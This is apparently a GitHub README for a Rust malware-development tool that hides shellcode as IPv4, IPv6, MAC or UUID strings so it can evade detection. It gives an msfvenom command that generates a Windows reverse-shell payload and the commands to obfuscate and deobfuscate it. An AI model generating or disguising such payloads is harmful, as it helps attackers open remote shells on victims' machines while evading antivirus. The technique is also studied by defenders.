Skip to content

Latest commit

 

History

History

obfuscation

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 
 
 
 
 
 
 
 
 

Shellcode Obfuscation and Deobfuscation Technique

With this code you can obfuscate and deobfuscate shellcode using Ipv4, Ipv6, MAC, UUiD formats.

Usages

Due to security reasons. Im removing the payload.bin. You generate the .bin on you own ..!

Example: msfvenom -p windows/shell/reverse_tcp lhost=eth0 lport=4444 -f raw -o payload.bin

Command Format

cargo run -- -f <file> -t <technique> -o <operation>

simply run the program to view the usages

cargo run

cargo run

To obfuscate the payload.

cargo run -- -f .\payload.bin -t ipv4 -o obfuscate

obfuscate ipv4

To Deobfuscate the paylaod

cargo run -- -f .\obfuscated_ipv4.txt -t ipv4 -o deobfuscate

deobfuscate ipv4

ALL USAGES

Obfuscation Commands

Obfuscate Using IPv4

cargo run -- -f .\payload.bin -t ipv4 -o obfuscate

Obfuscate Using IPv6

cargo run -- -f .\payload.bin -t ipv6 -o obfuscate

Obfuscate Using MAC

cargo run -- -f .\payload.bin -t mac -o obfuscate

Obfuscate Using UUID

cargo run -- -f .\payload.bin -t uuid -o obfuscate

Deobfuscation Commands

Deobfuscate Using IPv4

cargo run -- -f .\obfuscated_ipv4.txt -t ipv4 -o deobfuscate

Deobfuscate Using IPv6

cargo run -- -f .\obfuscated_ipv6.txt -t ipv6 -o deobfuscate

Deobfuscate Using MAC

cargo run -- -f .\obfuscated_mac.txt -t mac -o deobfuscate

Deobfuscate Using UUID

cargo run -- -f .\obfuscated_uuid.txt -t uuid -o deobfuscate

Resources Used

Thanks for the Wonderful Content and Resource by Maldev Academy.

For more Malware POC and codes visit Rust for Malware Development Repository.

By @5mukx